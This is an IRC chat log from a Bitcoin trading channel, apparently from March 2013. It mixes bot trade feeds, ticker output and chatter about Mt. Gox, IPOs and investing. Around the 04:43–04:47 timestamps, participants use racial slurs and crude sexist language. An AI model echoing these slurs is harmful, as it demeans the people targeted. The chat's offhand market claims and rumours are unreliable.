mtgox 0.1000 @ 56.79214 EUR Mar 22 02:11:51 23:28 <+amphipod> Mar21 23:28:11 btc24 x3 7.1900 @ 57.00 EUR Mar 22 02:12:02 er, wrong spot Mar 22 02:12:04 gox is pushing price down Mar 22 02:12:27 that suggested bid feature they have is kinda fucked up Mar 22 02:12:34 ah i see a mtgox usd trade Mar 22 02:12:46 71 Mar 22 02:12:52 [HAVELOCK] [VTX] 2 @ 0.3923 = 0.7846 BTC [+] Mar 22 02:13:07 even Mar 22 02:13:14 at 1363911066 Mar 22 02:13:52 [HAVELOCK] [VTX] 202 @ 0.3923 = 79.2446 BTC [+] Mar 22 02:15:31 maybe they tried to go live with the coinlab thing at midnight utc Mar 22 02:16:30 was that today? Mar 22 02:16:39 that they planned the change? Mar 22 02:16:51 [BTCTC] [B.YABMC] 1 @ 0.016 BTC [-] Mar 22 02:16:53 [BTCTC] [B.YABMC] 1 @ 0.01591 BTC [-] Mar 22 02:16:55 [BTCTC] [B.YABMC] 10 @ 0.0155 = 0.155 BTC [-] Mar 22 02:16:57 [BTCTC] [B.YABMC] 1 @ 0.015 BTC [-] Mar 22 02:16:58 [BTCTC] [B.YABMC] 1 @ 0.014 BTC [-] Mar 22 02:17:16 what precisely is this weirdness? Mar 22 02:17:38 lol, a whole bunch of 70.85 trades went thru Mar 22 02:18:17 ThickAsThieves: i have no clue, just weirdness today Mar 22 02:18:39 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 22 02:18:44 this will be about correct Mar 22 02:19:00 [BTCTC] [S.DICE-PT] 1 @ 0.00401 BTC [-] Mar 22 02:19:16 quite the wall at 74 Mar 22 02:19:40 lucky bulls can climb Mar 22 02:19:46 thats what happens when gox tells all buyers that rate is 70.85 Mar 22 02:21:27 [HAVELOCK] [VTX] 12 @ 0.395 = 4.74 BTC [+] Mar 22 02:21:57 mhmm Mar 22 02:22:03 [HAVELOCK] [SDICE] 2 @ 0.4848 = 0.9696 BTC [+] Mar 22 02:22:04 we got this new IPO Mar 22 02:22:05 [HAVELOCK] [SDICE] 1 @ 0.48489999 BTC [+] Mar 22 02:22:06 [HAVELOCK] [SDICE] 4 @ 0.485 = 1.94 BTC [+] Mar 22 02:22:09 man i need to write a prospectus for a $100k ipo Mar 22 02:22:10 [BTCTC] [GSDPT] 1 @ 0.0042 BTC [-] Mar 22 02:22:26 Guys, invest in my business! Mar 22 02:22:45 [HAVELOCK] [VTX] 50 @ 0.395 = 19.75 BTC [+] Mar 22 02:23:34 [HAVELOCK] [VTX] 15 @ 0.395 = 5.925 BTC [+] Mar 22 02:23:51 [HAVELOCK] [VTX] 3 @ 0.395 = 1.185 BTC [+] Mar 22 02:24:30 http://geizhals.at/?phistgfx=652381&loc=de&age=9999&width=640&l=de&dc=EUR Mar 22 02:24:33 DDR3 prices Mar 22 02:24:36 [HAVELOCK] [VTX] 4 @ 0.395 = 1.58 BTC [+] Mar 22 02:24:42 dis better dan bitcoin Mar 22 02:24:45 ThickAsThieves: your proposal makes too much sense Mar 22 02:24:50 so someone just gave me this raspberry pi, and if I weren't actually busy with things, I'd set up a mining company called "MINIMINER" Mar 22 02:24:56 mimic all the scam copy Mar 22 02:25:01 I thought VTX was .38 Mar 22 02:25:01 thow in some spelling/grammar fuckups Mar 22 02:25:09 thow indeed Mar 22 02:25:21 vtx ipo is priced dynamic to btc/cad Mar 22 02:25:51 so its pegged to the dollar then Mar 22 02:26:05 yes Mar 22 02:26:05 thats not a spelling error btw thats lag Mar 22 02:26:06 btc/cad SPOT price? Mar 22 02:26:15 that would be insane Mar 22 02:26:36 $30CAD or therabouts i think Mar 22 02:26:55 still figuring out if they are worth 3 million dollars Mar 22 02:27:20 coinlab is going to the us, they mentioned canada.. Mar 22 02:27:22 buy some stock and figure it out with friends! Mar 22 02:27:49 somehting funny, Mar 22 02:27:56 is the Crypto-trade ipo Mar 22 02:27:59 [HAVELOCK] [VTX] 57 @ 0.395 = 22.515 BTC [+] Mar 22 02:28:04 yes, it was also way overpriced Mar 22 02:28:06 but Mar 22 02:28:09 mhm, people seem to buy it Mar 22 02:28:19 they are super slow in updating their price on the ltcglobal version Mar 22 02:28:30 so you can get shares at like 20%+ off Mar 22 02:29:30 seems like a scam red flag to me Mar 22 02:32:57 hi Mar 22 02:33:09 [HAVELOCK] [VTX] 1 @ 0.4084 BTC [+] Mar 22 02:33:14 anything i can trade with only 0.02 btc Mar 22 02:36:10 i can trade you some tf2 hats Mar 22 02:36:31 [HAVELOCK] [VTX] 4 @ 0.4084 = 1.6336 BTC [+] Mar 22 02:36:37 you can buy litecoins Mar 22 02:37:25 litecoins are pretty much back to where it was Mar 22 02:37:36 slightly above before the great flash rally Mar 22 02:37:37 [HAVELOCK] [VTX] 3 @ 0.4084 = 1.2252 BTC [+] Mar 22 02:39:21 Bowjob , arent those free ? .. Mar 22 02:39:32 Tf2? hats? Mar 22 02:39:37 [HAVELOCK] [VTX] 500 @ 0.4084 = 204.2 BTC [+] Mar 22 02:39:44 you can get them via drop, but you can sell them for paypal stuffs Mar 22 02:40:07 [BTCTC] [ASICMINER-PT] 1 @ 0.85887 BTC [+] Mar 22 02:40:12 holy crap thats a lot of vtx sales Mar 22 02:40:14 you can be the king of TF2 if you have the burnign team captain hat, worth about $3 grand Mar 22 02:40:41 and yes, people pay real money for hats Mar 22 02:41:43 [HAVELOCK] [VTX] 3 @ 0.4084 = 1.2252 BTC [+] Mar 22 02:42:37 I´ll be better modeling something for second life Mar 22 02:42:46 if it was me Mar 22 02:43:45 the top hat maker makes about 500k a year Mar 22 02:49:14 [BTCTC] [PAJKA.BOND] 1 @ 0.1099 BTC [+] Mar 22 02:50:03 [HAVELOCK] [VTX] 1 @ 0.4013 BTC [-] Mar 22 02:50:44 I know who bought the avalon for 20k Mar 22 02:50:53 [HAVELOCK] [VTX] 4 @ 0.4013 = 1.6052 BTC [-] Mar 22 02:51:45 [HAVELOCK] [VTX] 3 @ 0.4013 = 1.2039 BTC [-] Mar 22 02:53:50 [HAVELOCK] [VTX] 3 @ 0.4013 = 1.2039 BTC [-] Mar 22 02:54:13 ;;ticker Mar 22 02:54:14 BTCUSD ticker | Best bid: 70.90000, Best ask: 70.90001, Bid-ask spread: 0.00001, Last trade: 70.90001, 24 hour volume: 92929.72727128, 24 hour low: 63.10100, 24 hour high: 74.90000, 24 hour vwap: 69.25416 Mar 22 02:54:14 ngzang? Mar 22 02:54:42 http://i.imgur.com/8tSEbLz.png Mar 22 02:54:45 try again Mar 22 02:58:47 [BTCTC] [ASICMINER-PT] 1 @ 0.85887 BTC [+] Mar 22 02:59:35 [HAVELOCK] [VTX] 1 @ 0.4013 BTC [-] Mar 22 03:00:16 [HAVELOCK] [VTX] 2 @ 0.4074 = 0.8148 BTC [+] Mar 22 03:08:54 lol 71 days to go... Mar 22 03:09:18 !ticker h VTX Mar 22 03:09:20 [HAVELOCK:VTX] 1D: 0.38280000 / 0.39073395 / 0.43320000 (5939 shares, 2320.56890000 BTC), 7D: 0.38280000 / 0.39183944 / 0.46140000 (6063 shares, 2375.72250000 BTC), 30D: 0.38280000 / 0.39183944 / 0.46140000 (6063 shares, 2375.72250000 BTC) Mar 22 03:09:37 hmm Mar 22 03:12:25 [HAVELOCK] [VTX] 535 @ 0.4074 = 217.959 BTC [+] Mar 22 03:14:13 [HAVELOCK] [VTX] 1 @ 0.4074 BTC [+] Mar 22 03:14:27 [HAVELOCK] [VTX] 181 @ 0.4074 = 73.7394 BTC [+] Mar 22 03:16:35 [HAVELOCK] [VTX] 25 @ 0.4013 = 10.0325 BTC [-] Mar 22 03:17:15 [BTCTC] [COGNITIVE] 1 @ 0.16 BTC [+] Mar 22 03:17:47 [HAVELOCK] [VTX] 200 @ 0.4013 = 80.26 BTC [-] Mar 22 03:18:28 where is all this money for VTX coming from? Mar 22 03:18:52 dunno Mar 22 03:18:55 [HAVELOCK] [VTX] 10 @ 0.4013 = 4.013 BTC [-] Mar 22 03:21:41 There's plenty of money for VTX Mar 22 03:22:01 [HAVELOCK] [VTX] 7 @ 0.4013 = 2.8091 BTC [-] Mar 22 03:23:28 thats an answer Mar 22 03:34:41 !ticker havelock vtc Mar 22 03:34:42 I don't know those people, and they don't look very friendly. Mar 22 03:34:46 !ticker havelock vtx Mar 22 03:34:48 [HAVELOCK:VTX] 1D: 0.38280000 / 0.39283695 / 0.43320000 (6898 shares, 2709.78930000 BTC), 7D: 0.38280000 / 0.39375433 / 0.46140000 (7022 shares, 2764.94290000 BTC), 30D: 0.38280000 / 0.39375433 / 0.46140000 (7022 shares, 2764.94290000 BTC) Mar 22 03:34:51 !ticker btct asicminer-pt Mar 22 03:34:53 [BTCT:ASICMINER-PT] 1D: 0.832 / 0.87807 / 0.93 (269 shares, 236.2 BTC), 7D: 0.769995 / 0.85241 / 0.9489 (1434 shares, 1222.4 BTC), 30D: 0.65 / 0.76435 / 1 (3497 shares, 2672.9 BTC) Mar 22 03:34:56 ahem, Mar 22 03:35:09 cavirtex owns asicminer. Mar 22 03:37:04 Oh... nice theory Mar 22 03:37:24 it's a point of fact. Mar 22 03:37:36 cavirtex got more in a day than asicmienr in two weeks. Mar 22 03:37:41 this is what a blown ipo looks like. Mar 22 03:39:24 [BTCTC] [ASICMINER-PT] 12 @ 0.85887 = 10.3064 BTC [+] Mar 22 03:39:47 all havelockinvestments.com funds are blown... Mar 22 03:39:55 [BTCTC] [ASICMINER-PT] 3 @ 0.85888 = 2.5766 BTC [+] Mar 22 03:40:05 idk why but maybe Canadians just don't know about anything else that that one. Mar 22 03:40:17 [HAVELOCK] [VTX] 30 @ 0.3987 = 11.961 BTC [-] Mar 22 03:40:17 and don't know about the risks involved. Mar 22 03:40:18 Namworld asicminer is blown. Mar 22 03:40:25 cavirtex is doing just fine i'd say. Mar 22 03:40:26 oh, that too for sure Mar 22 03:40:37 i mean, they wanted 300k got about half of it so far ? Mar 22 03:44:51 more than that. Like 7/10th of it Mar 22 03:45:01 Less than 3k/10k left Mar 22 03:45:12 Valued at 3 million it seems. Mar 22 03:45:13 Namworld: what are the other fund/investment options for those of us who aren't on mpex directly? Mar 22 03:45:30 bitfunder.com or btct.co Mar 22 03:45:41 Although the quality choices are more limited Mar 22 03:45:45 Thanks, I just can't keep up with all the developments and keep my day job. Mar 22 03:45:59 What's this bitfinex I heard earlier today a few times? Mar 22 03:46:14 Googled it, just saw a gaming hardware builder Mar 22 03:46:39 unbalanced there's mpex pass-through vehicles pretty much on all three Mar 22 03:47:05 also jurov runs a broker website (coinbr.com) and i think he's doing something with futures too Mar 22 03:47:23 [HAVELOCK] [VTX] 22 @ 0.4027 = 8.8594 BTC [+] Mar 22 03:47:54 I was pleased to find SDICE via Havelock and haven't looked much past that. Mar 22 03:48:01 re bitfinex prolly check out https://bitcointalk.org/index.php?topic=140484.0 Mar 22 03:48:03 Busy/lazy Mar 22 03:48:31 Ah... so MPOE-PR seriously isn't you with a girl's picture? Mar 22 03:48:55 Or are we not allowed to ask that? "Pay no attention to the man behind the curtain!" Mar 22 03:48:58 seriously. Mar 22 03:49:46 (Someone will do a lexical analysis someday.) Mar 22 03:50:20 I think its a bit of both Mar 22 03:50:41 theres a girl driving the account, sometimes she gets scripts or at least dictation Mar 22 03:51:18 Listen I should warn you all I put some serious (for me) money into Bitcoin today after not holding nearly enough during the run-up. Mar 22 03:51:31 So, yeah. That was officially the top. Mar 22 03:51:36 dub she's pr, obviously she dioesn;'t compose her own poetry over there. Mar 22 03:51:42 at least in my opinion, some of the rants take on a scary level of MP semblance Mar 22 03:52:31 Okay so coinbr gets me access to some of the MPEx features I wouldn't get yet with Havelock. Roger. Mar 22 03:53:21 and reduced risk of avoiding passthroughs Mar 22 03:53:33 s/of/through Mar 22 03:53:52 http://mpex.co << spanish faq too Mar 22 03:54:29 actually most of her job consists on reading, selecting and summarizing the nonsense people post there. Mar 22 03:54:52 My favourite in the FAQ is #10: "You know those charts without any indication of scale ? That's not how charts work." Mar 22 03:55:34 *That's* where I've seen coinbr.com before... for its charts. Didn't grok that it was also a service. Mar 22 03:55:46 Via that FAQ link. Mar 22 03:56:02 http://www.namworld.net/pf/bitvps.com/openvz-vps Mar 22 03:56:02 VS Mar 22 03:56:02 https://www.bitvps.com/openvz-vps Mar 22 03:56:05 fyi all the cool kids use this referral link https://coinbr.com/ref?c=A3R7Tstq16 Mar 22 03:56:06 please vote Mar 22 03:57:32 [HAVELOCK] [VTX] 2 @ 0.4027 = 0.8054 BTC [+] Mar 22 03:59:48 [HAVELOCK] [VTX] 248 @ 0.4027 = 99.8696 BTC [+] Mar 22 03:59:48 Maybe a darker body font if you go with that grid-y background. Or did I misunderstand vote? Mar 22 04:00:39 actually, just tile vs no tiles for background. So far seems people liked tiles more but just checking further. Mar 22 04:00:41 wow. 248 shares Mar 22 04:00:52 ;;ticker Mar 22 04:00:53 Rest of the staff doesn't agree with the tiles Mar 22 04:00:53 BTCUSD ticker | Best bid: 72.00001, Best ask: 72.05000, Bid-ask spread: 0.04999, Last trade: 72.05000, 24 hour volume: 93837.20934717, 24 hour low: 63.10100, 24 hour high: 74.90000, 24 hour vwap: 69.38534 Mar 22 04:02:01 i should hire someone to troll the forum and report its activity back to me too Mar 22 04:02:02 I like tiles but small body font is too close a shade to them. IMO Mar 22 04:02:16 smickles lol Mar 22 04:02:16 http://www.namworld.net/pf/bitvps.com/kvm-vps Mar 22 04:02:24 soon enough btctalk will be fully robotized Mar 22 04:02:29 sorta like hft Mar 22 04:02:38 I'll add some background container for the text Mar 22 04:02:58 You did, yeah, I see... works I guess Mar 22 04:04:52 what, not 80 yet ? Mar 22 04:04:53 wtf! Mar 22 04:04:53 But the all-white bg beats the one with a container for the next. Mar 22 04:04:59 *text Mar 22 04:05:28 mircea_popsecu: see above, I bought in. Kiss of death. Mar 22 04:05:31 ikr Mar 22 04:05:36 bitcoin such a fail investment Mar 22 04:05:53 brb, moving to ixcoins Mar 22 04:07:20 mircea_popescu: mtgox cooled things off by stopping usd trades for ~10 min following midnight utc Mar 22 04:07:59 wat Mar 22 04:08:20 yeah, for that time it showed last: 70.85 Mar 22 04:08:48 gribble's ticker didn't work b/c it used the http api ticker which was offline Mar 22 04:09:00 and only non usd trades were being made Mar 22 04:09:15 my bot couldn't even fetch the market depth for usd Mar 22 04:09:42 [HAVELOCK] [VTX] 10 @ 0.4027 = 4.027 BTC [+] Mar 22 04:10:14 ... Mar 22 04:10:15 any big trades prior? Mar 22 04:10:22 like 20k btc big Mar 22 04:10:26 not that i saw Mar 22 04:10:35 it happened to the second on midnight Mar 22 04:11:03 I came in mid conversation - does someone need someone to set up a vote on bitcointalk about whether to add a tile background to mpex.co? In addition to the cherries? Mar 22 04:11:03 my wild guess what it was a botched switch over to coinwho Mar 22 04:11:20 Namworld: strawpoll.me Mar 22 04:11:22 use it Mar 22 04:11:31 those things are awesome! Mar 22 04:11:55 realtime polls, all animated and such Mar 22 04:13:19 mircea_popescu: thanks for the FAQ link btw... I'd already read it, but I'll have to take a vacation to implement and the now-$2100 equiv for a seat is out of my budget range. I was too late to the party so I'll have to stick with the passthroughs. Mar 22 04:13:36 not a crime. Mar 22 04:15:29 mucho respect for what y'all have built though. I feel smarter just trying to read up on this channel. Mar 22 04:16:19 not a bad idea, smickles Mar 22 04:16:34 I could do without the nastier porn links, but hey, that's just me. Mar 22 04:16:37 Poll on bitvps design: http://strawpoll.me/10592 Mar 22 04:16:56 smickles: is @dandirks, the strawpoll guy, a bitcoiner? Mar 22 04:17:02 [HAVELOCK] [VTX] 100 @ 0.4027 = 40.27 BTC [+] Mar 22 04:17:15 unbalanced: i don't have any idea Mar 22 04:17:22 ah, just a coincidence Mar 22 04:17:25 [HAVELOCK] [VTX] 7 @ 0.4027 = 2.8189 BTC [+] Mar 22 04:17:32 i just know of the site from other people using it Mar 22 04:18:27 aw, no love for the poll? Mar 22 04:19:04 whats a fair markup for otc bitcoin? Mar 22 04:19:09 And just a coincidence then -- I do some polling stuff and we work in node.js and we built something like that. That's what I'm talking about, you brainiacs knock something out in a weekend and I can't get a project launched in a year. Mar 22 04:19:29 dub: depends on the method of transmission Mar 22 04:19:31 unbalanced just filter out dtng you'll be fine Mar 22 04:19:43 try http://namcdn.com/btcalarm Mar 22 04:19:47 dub it'd depend on your op neh ? Mar 22 04:19:57 cash face to face Mar 22 04:20:02 still. Mar 22 04:20:15 (op = other party) Mar 22 04:20:16 [HAVELOCK] [VTX] 100 @ 0.4027 = 40.27 BTC [+] Mar 22 04:20:24 oh, buddies Mar 22 04:20:26 I did that somewhere when Bitcoin price started getting volatile. I use it to wake me up when price goes past my set threshold. Mar 22 04:20:27 i'd only give travel consideration to the markup on face to face cash Mar 22 04:20:30 people I like Mar 22 04:20:55 mircea_popescu, I read your stuff (er, MPOE-PR's) about "you're not exceptional, get over yourself" or somesuch. Brilliant... and I had to agree. I'd come to that realization already tho. Mar 22 04:21:25 you're a vanishing minority. Mar 22 04:21:37 dub then why are you surcharging buddies Mar 22 04:22:08 cause they will ask what my end is and think its wierd there isnt one Mar 22 04:22:21 this bitcoin surge is pretty cool in that it drives people back to btc. this person invested in mpoe on the first round (feb 2012) Mar 22 04:22:32 then made a mpex acct back then, had shares transfgerred there Mar 22 04:22:35 divs accumulating Mar 22 04:22:52 today is like hey... is my stuff still there ?! Mar 22 04:23:11 i'm like sure... all the many thousand dollars' worth of it Mar 22 04:23:20 mircea_popescu: 30 day oix :D Mar 22 04:23:35 smickles it'd be shit tho casue it'd mix across opex lines i think Mar 22 04:23:38 I guess .5 or 1% would be ok Mar 22 04:23:48 mircea_popescu: fine, 25 day Mar 22 04:24:14 i feel it'd be an indicator of how well mpoebot is doing Mar 22 04:24:21 smickles if you think about it, 1 week oix is across lines for 12 days out of 30 Mar 22 04:24:39 bah, i only want it for this in the last week Mar 22 04:24:40 im sorry. 6 not 12 Mar 22 04:25:08 otherwise, the 7day is just fine Mar 22 04:25:17 $vwap ^oix Mar 22 04:25:18 smickles: 1 day: no data 7 day: average: 55.42906834 high: 57.60574549 low: 51.19305144 volume: 14257 btc: 1202.67534357 30 day: no data Mar 22 04:25:32 55 Mar 22 04:25:53 fer srs Mar 22 04:26:46 it doesn't think much of the rally lately does it. Mar 22 04:27:00 that implies that there's a lot of getting fucked about to happen if the price holds Mar 22 04:28:35 not necessarily Mar 22 04:28:48 if someone bought calls when the price was 40 implying 50 they're golden Mar 22 04:29:11 aw, that's no fun, and should reread how that's calculated Mar 22 04:29:27 inser 'I' somewhere in there Mar 22 04:30:41 [HAVELOCK] [VTX] 22 @ 0.3987 = 8.7714 BTC [-] Mar 22 04:31:13 [HAVELOCK] [VTX] 4 @ 0.3987 = 1.5948 BTC [-] Mar 22 04:31:37 [HAVELOCK] [VTX] 50 @ 0.3987 = 19.935 BTC [-] Mar 22 04:32:44 !help Mar 22 04:32:45 List of commands: Mar 22 04:32:46 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Mar 22 04:32:47 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Mar 22 04:32:48 !mp (desc: returns the response from MPEX order) Mar 22 04:32:49 !rules (desc: chan guidelines) {short: !r} Mar 22 04:32:50 !exchanges (desc: lists exchanges and brokers) {short: !e} Mar 22 04:32:51 [HAVELOCK] [VTX] 200 @ 0.3987 = 79.74 BTC [-] Mar 22 04:32:53 [HAVELOCK] [VTX] 50 @ 0.3987 = 19.935 BTC [-] Mar 22 04:33:53 !last Mar 22 04:33:54 Are you sure you have no tobacco? Mar 22 04:34:07 hello notal Mar 22 04:34:15 hello Mar 22 04:34:20 http://www.zerohedge.com/news/2013-03-21/us-begins-regulating-bitcoin-will-consider-virtual-transactions-money-laundering << basically zerohedge is the new zeroclue ? Mar 22 04:34:42 [HAVELOCK] [VTX] 8 @ 0.3987 = 3.1896 BTC [-] Mar 22 04:34:45 !last m s.mpoe Mar 22 04:34:45 Last trade for S.MPOE on MPEX was at 0.00072101 BTC [-] Mar 22 04:34:57 mircea_popescu: yeah Mar 22 04:35:27 https://bitcointalk.org/index.php?topic=155098.msg1656127#msg1656127 o boy watch the silver butthurt nao. Mar 22 04:36:12 https://lh5.googleusercontent.com/-s0d-GHe6W8o/UUocFG_0D_I/AAAAAAAAHbg/4PysJZ5-vwU/s648/Dont-Steal-The-government-hates-competition1.jpg < /me lold Mar 22 04:36:33 lol Mar 22 04:37:04 [HAVELOCK] [SDICE] 4 @ 0.445 = 1.78 BTC [-] Mar 22 04:39:45 smickles: i've always had a special place in my heart for anyone who sports that bumper sticker Mar 22 04:40:15 don't see it very often, but when I do, i smile :) Mar 22 04:40:28 this is the first i've seen it Mar 22 04:40:32 i want one Mar 22 04:40:38 oh its an oldie but goodie Mar 22 04:40:50 and pretty rare to see. gotta love it. Mar 22 04:40:52 you'll find it right next to a confederate flag sticker Mar 22 04:40:59 naw Mar 22 04:41:06 the driver will be chewing tobacco Mar 22 04:41:09 it's a good'n Mar 22 04:41:09 those people are nitwits Mar 22 04:41:26 maybe you'll see hoffman's 'steal this book' above it in the window Mar 22 04:41:37 or on a seat in the car Mar 22 04:42:19 or mitnicks 'the art of deception' Mar 22 04:42:40 i think dub is a leftie Mar 22 04:43:04 naw, he's just a yankee carpet-bagger Mar 22 04:43:08 ;) Mar 22 04:43:18 haha Mar 22 04:43:33 leftie, greenie, nigger.. choose your favorite reason to hate Mar 22 04:43:40 what, you're black !? Mar 22 04:43:47 greenie? Mar 22 04:43:53 not black per se Mar 22 04:43:57 (green party) Mar 22 04:44:04 i just hate you cause you're a sociopath that's all Mar 22 04:44:16 oh, i get it, dub is al rhoker Mar 22 04:44:20 HA Mar 22 04:44:56 guys, it started Mar 22 04:44:59 ;;ticker Mar 22 04:45:00 BTCUSD ticker | Best bid: 72.31111, Best ask: 72.40795, Bid-ask spread: 0.09684, Last trade: 72.50000, 24 hour volume: 92454.90765557, 24 hour low: 63.10100, 24 hour high: 74.90000, 24 hour vwap: 69.55651 Mar 22 04:45:01 ;;ticker Mar 22 04:45:02 BTCUSD ticker | Best bid: 72.31111, Best ask: 72.40795, Bid-ask spread: 0.09684, Last trade: 72.50000, 24 hour volume: 92454.90765557, 24 hour low: 63.10100, 24 hour high: 74.90000, 24 hour vwap: 69.55651 Mar 22 04:45:05 ha! Mar 22 04:45:06 hyper inflation is happening Mar 22 04:45:07 http://www.amazon.com/gp/offer-listing/B002INQ074/ie=UTF8&qid=1363919668 Mar 22 04:45:08 !! Mar 22 04:45:14 btc is stable now. Mar 22 04:45:22 lol Mar 22 04:45:29 im a .. Mar 22 04:45:31 oh wow Mar 22 04:45:37 fuck i dont know whats next after trillion Mar 22 04:45:41 quadrillion, right Mar 22 04:45:47 anyway, am i the only one amused at the circumstance that the silly left has vanquished all hatespeech, they don't hate niggers, spics or spans anymore Mar 22 04:45:54 they just hate sociopaths and that's all ? Mar 22 04:46:20 mircea_popescu: and smokers Mar 22 04:46:22 haha, yeah the left used to be the ones with the white hoods on Mar 22 04:46:27 smickles smokers are sociopaths Mar 22 04:46:33 D: Mar 22 04:46:41 the old-south democrats Mar 22 04:46:48 Is it me or everyone are sociopaths nowadays? Mar 22 04:46:49 dixie-crats or whatever Mar 22 04:46:53 that's the great progrss here : by detaching nigger-ness from skin color, slovenly-sluttyness from cuntal lips and everything from everything else Mar 22 04:46:58 you can build a construct of pure evil Mar 22 04:47:10 [HAVELOCK] [VTX] 2 @ 0.3987 = 0.7974 BTC [-] Mar 22 04:47:19 and live under the impression that while you walk the earth with the retarded brain of the spanish faithful cca 1500 Mar 22 04:47:23 still progress has occured Mar 22 04:48:23 you forgot the one thing the left hates most Mar 22 04:48:28 the right Mar 22 04:48:38 ya but those are mostly sociopaths anyway Mar 22 04:48:48 these days for sure Mar 22 04:48:53 [HAVELOCK] [VTX] 50 @ 0.3987 = 19.935 BTC [-] Mar 22 04:49:29 [HAVELOCK] [VTX] 2 @ 0.3987 = 0.7974 BTC [-] Mar 22 04:51:08 (19:46) < smickles> mircea_popescu: and smokers << this is ironic as obama is a smoker Mar 22 04:51:32 don't be racist. Mar 22 04:53:16 wat Mar 22 04:54:07 dammit people wanting me to be useful on a firday Mar 22 04:54:12 friday* Mar 22 04:54:56 so yeah; left, green, black and according to some silly chart linked here the other day, in the 1% Mar 22 04:56:37 thats gotta put a few 'muricans into therapy rite? Mar 22 04:57:42 oh and I'm fine with paying >50% tax and geting free healthcare for it Mar 22 04:57:58 how come ? Mar 22 04:58:10 because tax is good Mar 22 04:58:18 [HAVELOCK] [VTX] 20 @ 0.3987 = 7.974 BTC [-] Mar 22 04:58:20 ... Mar 22 04:58:22 [HAVELOCK] [VTX] 2 @ 0.3987 = 0.7974 BTC [-] Mar 22 04:58:23 the state provides for me, so I provide for them Mar 22 04:58:36 you're evil. Mar 22 04:58:54 [BTCTC] [S.DICE-PT] 16 @ 0.00486 = 0.0778 BTC [+] Mar 22 04:58:57 [BTCTC] [S.DICE-PT] 4 @ 0.00486 = 0.0194 BTC [+] Mar 22 05:02:30 http://bitbet.us/bet/295/btc-usd-will-top-68-in-2013/ Mar 22 05:02:35 whodda thunk it, seriously now Mar 22 05:07:04 [HAVELOCK] [VTX] 1 @ 0.3976 BTC [-] Mar 22 05:07:48 [MPEX] [O.BTCUSD.P510T] 1 @ 0.05328501 BTC [+] Mar 22 05:07:53 http://imgur.com/1CR7ez0 Mar 22 05:08:16 [HAVELOCK] [VTX] 25 @ 0.3976 = 9.94 BTC [-] Mar 22 05:08:30 lol invest in gold! Mar 22 05:09:07 incredible similarity Mar 22 05:09:24 ... Mar 22 05:09:26 [HAVELOCK] [VTX] 8 @ 0.3976 = 3.1808 BTC [-] Mar 22 05:10:08 large ask wall and a weakening bid Mar 22 05:10:21 has to be reptilian manipulation Mar 22 05:10:38 wow Mar 22 05:10:49 bet we go into low 60's by tomorrow Mar 22 05:10:57 ;;bids 60 Mar 22 05:10:58 There are currently 20145.971 bitcoins demanded at or over 60.0 USD, worth 1315049.984 USD in total. | Data vintage: 74.7298 seconds Mar 22 05:11:00 [HAVELOCK] [VTX] 75 @ 0.3976 = 29.82 BTC [-] Mar 22 05:11:18 ;;asks 75 Mar 22 05:11:18 There are currently 17615.611 bitcoins offered at or under 75.0 USD, worth 1308515.06392 USD in total. | Data vintage: 95.0453 seconds Mar 22 05:12:01 the wall, Mar 22 05:12:04 it is fake. Mar 22 05:12:16 http://i.imgur.com/Won93wr.png Mar 22 05:12:22 how can you tell kako Mar 22 05:12:54 he has the hat. Mar 22 05:12:54 you can judge by the sound if you knock on it Mar 22 05:16:00 (19:58) < dub> because tax is good << trolololo? Mar 22 05:18:07 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35497416 = 354.9742 BTC [+] Mar 22 05:19:34 hmm calls closing ? Mar 22 05:19:50 could this be the end of the climb ? Mar 22 05:20:58 [MPEX] [O.BTCUSD.P750T] 2 @ 0.137451 = 0.2749 BTC [-] Mar 22 05:20:59 [MPEX] [O.BTCUSD.P750T] 998 @ 0.16907668 = 168.7385 BTC [+] Mar 22 05:21:59 a weekend timeout perhaps Mar 22 05:22:03 ;;calc 75/1.13745 Mar 22 05:22:03 65.9369642622 Mar 22 05:22:07 a the weekend is coming huh Mar 22 05:22:29 that's a lot of beer money Mar 22 05:23:58 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35516019 = 355.1602 BTC [+] Mar 22 05:25:09 [HAVELOCK] [VTX] 2 @ 0.3914 = 0.7828 BTC [-] Mar 22 05:25:54 http://mpex.co/?mpsic=O.BTCUSD.C450T Mar 22 05:26:03 indeed that is how profits look Mar 22 05:26:43 woah Mar 22 05:27:35 mod6: I recognise the need for governance over human society and an happy to support it Mar 22 05:28:26 we're just too shit as individuals to make it work Mar 22 05:29:08 [HAVELOCK] [VTX] 2 @ 0.3914 = 0.7828 BTC [-] Mar 22 05:29:41 [HAVELOCK] [VTX] 1 @ 0.3914 BTC [-] Mar 22 05:29:50 hmm, what does it mean if gov't is made up of individuals? Mar 22 05:30:04 [HAVELOCK] [SDICE] 4 @ 0.44000002 = 1.76 BTC [-] Mar 22 05:30:04 [HAVELOCK] [SDICE] 9 @ 0.44000001 = 3.96 BTC [-] Mar 22 05:30:05 [HAVELOCK] [SDICE] 7 @ 0.44 = 3.08 BTC [-] Mar 22 05:30:27 its hopefully not, they act under rules decided by majority Mar 22 05:30:44 ah, so mob rule Mar 22 05:30:58 yeah or democracy, whatever you want to call it Mar 22 05:31:30 ;;goxlag Mar 22 05:31:31 3.387687 seconds Mar 22 05:31:47 how exactly is goxlag calculated? Mar 22 05:31:53 are there any democracies in the world Mar 22 05:31:54 ? Mar 22 05:32:16 i was under the impression that most 'democracies' are actually republics Mar 22 05:32:47 http://i.imgur.com/X22bRY2.gif wowzer Mar 22 05:33:57 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35534611 = 355.3461 BTC [+] Mar 22 05:34:14 the method of governance is what im interested in, not an arbitrary label but I think no? Mar 22 05:34:28 ahh, i nearly forgot. the moment i've long awaited : Mar 22 05:34:34 !ticker m s.mpoe Mar 22 05:34:35 [MPEX:S.MPOE] 1D: 0.00069171 / 0.0007234 / 0.00074208 (363544 shares, 262.99 BTC), 7D: 0.00066743 / 0.00072074 / 0.00077505 (3180083 shares, 2,292.02 BTC), 30D: 0.00061614 / 0.00070767 / 0.00078628 (37489099 shares, 26,529.98 BTC) Mar 22 05:34:35 ;;ticker Mar 22 05:34:36 BTCUSD ticker | Best bid: 73.40000, Best ask: 73.54000, Bid-ask spread: 0.14000, Last trade: 73.54000, 24 hour volume: 92626.33775863, 24 hour low: 63.10100, 24 hour high: 74.90000, 24 hour vwap: 69.81455 Mar 22 05:34:53 